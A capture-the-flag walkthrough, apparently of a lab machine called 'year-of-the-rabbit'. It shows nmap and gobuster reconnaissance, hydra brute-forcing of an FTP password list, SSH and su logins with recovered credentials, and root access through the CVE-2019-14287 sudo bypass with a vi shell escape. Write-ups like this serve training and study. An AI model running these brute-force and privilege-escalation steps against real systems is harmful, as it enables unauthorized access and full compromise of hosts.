Using nmap to scan and identify open ports and services
nmap -Pn -sC -sV 10.10.243.87
Starting Nmap 7.92 ( https://nmap.org ) at 2022-07-17 20:54 IST
Nmap scan report for 10.10.243.87
Host is up (0.17s latency).
Not shown: 997 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.2
22/tcp open ssh OpenSSH 6.7p1 Debian 5 (protocol 2.0)
| ssh-hostkey:
| 1024 a0:8b:6b:78:09:39:03:32:ea:52:4c:20:3e:82:ad:60 (DSA)
| 2048 df:25:d0:47:1f:37:d9:18:81:87:38:76:30:92:65:1f (RSA)
| 256 be:9f:4f:01:4a:44:c8:ad:f5:03:cb:00:ac:8f:49:44 (ECDSA)
|_ 256 db:b1:c1:b9:cd:8c:9d:60:4f:f1:98:e2:99:fe:08:03 (ED25519)
80/tcp open http Apache httpd 2.4.10 ((Debian))
|_http-server-header: Apache/2.4.10 (Debian)
|_http-title: Apache2 Debian Default Page: It works
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 60.83 seconds
We find open port 21, 22, and 80 running ftp ,ssh and http server respectively
Webpage is a default Apache landing page
2. Scanning
2.1 Gobuster
Directory brute forcing using gobuster on port 80
gobuster dir -u http://10.10.243.87 -w /usr/share/wordlists/seclists/Discovery/Web-Content/raft-small-directories.txt
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.243.87
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/seclists/Discovery/Web-Content/raft-small-directories.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Timeout: 10s
===============================================================
2022/07/17 20:56:10 Starting gobuster in directory enumeration mode
===============================================================
/assets (Status: 301) [Size: 313] [--> http://10.10.243.87/assets/]
/server-status (Status: 403) [Size: 277]
===============================================================
2022/07/17 21:01:54 Finished
===============================================================
Going over to /assets, we find
Viewing style.css, we get another endpoint /sup3r_s3cr3t_fl4g.php
Going over, it pops up a warning to tun off the JavaScript and redirects us to a YouTube video of 'Rick Roll'
Capturing this request in burp,
We get an intermediary path /WExYY2Cv-qU
Going over to that path, while forwarding the request one at a time, we get an image Hot_Babe.png
Downlaoding the image
wget http://10.10.243.87/WExYY2Cv-qU/Hot_Babe.png 5m 44s
--2022-07-17 21:11:13-- http://10.10.243.87/WExYY2Cv-qU/Hot_Babe.png
Connecting to 10.10.243.87:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 475075 (464K) [image/png]
Saving to: ‘Hot_Babe.png’
Hot_Babe.png.1 100%[===========================================>] 463.94K 202KB/s in 2.3s
2022-07-17 21:11:16 (202 KB/s) - ‘Hot_Babe.png’ saved [475075/475075]
Using strings on the image, we get an FTP password list for the user ftpuser
Eh, you've earned this. Username for FTP is ftpuser
One of these is the password:
Mou+56n%QK8sr
1618B0AUshw1M
A56IpIl%1s02u
vTFbDzX9&Nmu?
FfF~sfu^UQZmT
8FF?iKO27b~V0
ua4W~2-@y7dE$
===========================================================
Saving these to pass.txt
2.2 Hydra
Using hydra to brute force ftp password
hydra -l ftpuser -P pass.txt ftp://10.10.243.87
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2022-07-17 21:15:04
[DATA] max 16 tasks per 1 server, overall 16 tasks, 82 login tries (l:1/p:82), ~6 tries per task
[DATA] attacking ftp://10.10.243.87:21/
[21][ftp] host: 10.10.243.87 login: ftpuser password: 5iez1wGXKfPKQ
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2022-07-17 21:15:19
We get the credentials
ftpuser : 5iez1wGXKfPKQ
Login in via FTP, we get a text file Eli's_Creds.txt
ftp 10.10.243.87
Connected to 10.10.243.87.
220 (vsFTPd 3.0.2)
Name (10.10.243.87:joseph): ftpuser
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rw-r--r-- 1 0 0 758 Jan 23 2020 Eli's_Creds.txt
226 Directory send OK.
ftp> get Eli's_Creds.txt
local: Eli's_Creds.txt remote: Eli's_Creds.txt
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for Eli's_Creds.txt (758 bytes).
226 Transfer complete.
758 bytes received in 0.00 secs (3.8248 MB/s)
ssh eli@10.10.243.87
The authenticity of host '10.10.243.87 (10.10.243.87)' can't be established.
ECDSA key fingerprint is SHA256:ISBm3muLdVA/w4A1cm7QOQQOCSMRlPdDp/x8CNpbJc8.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.243.87' (ECDSA) to the list of known hosts.
eli@10.10.243.87's password:
1 new message
Message from Root to Gwendoline:
"Gwendoline, I am not happy with you. Check our leet s3cr3t hiding place. I've left you a hidden message there"
END MESSAGE
It talks about a secret hiding place, with the secret spelled in leet code.
Searching for s3cr3t, we find a directory .usr/gamnes/s3cr3t
It has a hidden file .th1s_m3ss4ag3_15_f0r_gw3nd0l1n3_0nly!. Reading it
Your password is awful, Gwendoline.
It should be at least 60 characters long! Not just MniVCQVhQHUNI
Honestly!
Yours sincerely
-Root
We get the credentials
Gwendoline : MniVCQVhQHUNI
Switching user as gwendoline, we find user.txt in her home folder
eli@year-of-the-rabbit:/usr/games/s3cr3t$ su gwendoline
Password:
gwendoline@year-of-the-rabbit:/usr/games/s3cr3t$ cd /home/
gwendoline@year-of-the-rabbit:/home$ ls
eli gwendoline
gwendoline@year-of-the-rabbit:/home$ cd gwendoline/
gwendoline@year-of-the-rabbit:~$ ls
user.txt
4. Privilege Escalation
4.1 CVE-2019-14287
When using sudo -l, we get
wendoline@year-of-the-rabbit:~$ sudo -l
Matching Defaults entries for gwendoline on year-of-the-rabbit:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User gwendoline may run the following commands on year-of-the-rabbit:
(ALL, !root) NOPASSWD: /usr/bin/vi /home/gwendoline/user.txt
There is a !root specified, which means gwendoline can run /usr/bin/vi as any user but the root user
Viewing the sudo version we find that it is 1.8.10
sudo -V
Sudo version 1.8.10p3
Sudoers policy plugin version 1.8.10p3
Sudoers file grammar version 43
Sudoers I/O plugin version 1.8.10p3
This opens vi as root, and we can spawn as bash shell by typing :!/bin/sh
Reading the root.txt flag
whoami
root
cd /root
ls
root.txt
cat root.txt
Not your typical encoding. This is in fact a programming language called and you can decode it
This version is vulnerable to CVE-2019-14287 and it can be exploited to run as root by prepending sudo -u#-1 to the path of the command that can be run by the user, i.e. sudo -u#-1 /usr/bin/vi /home/gwendoline/user.txt. Read more about it
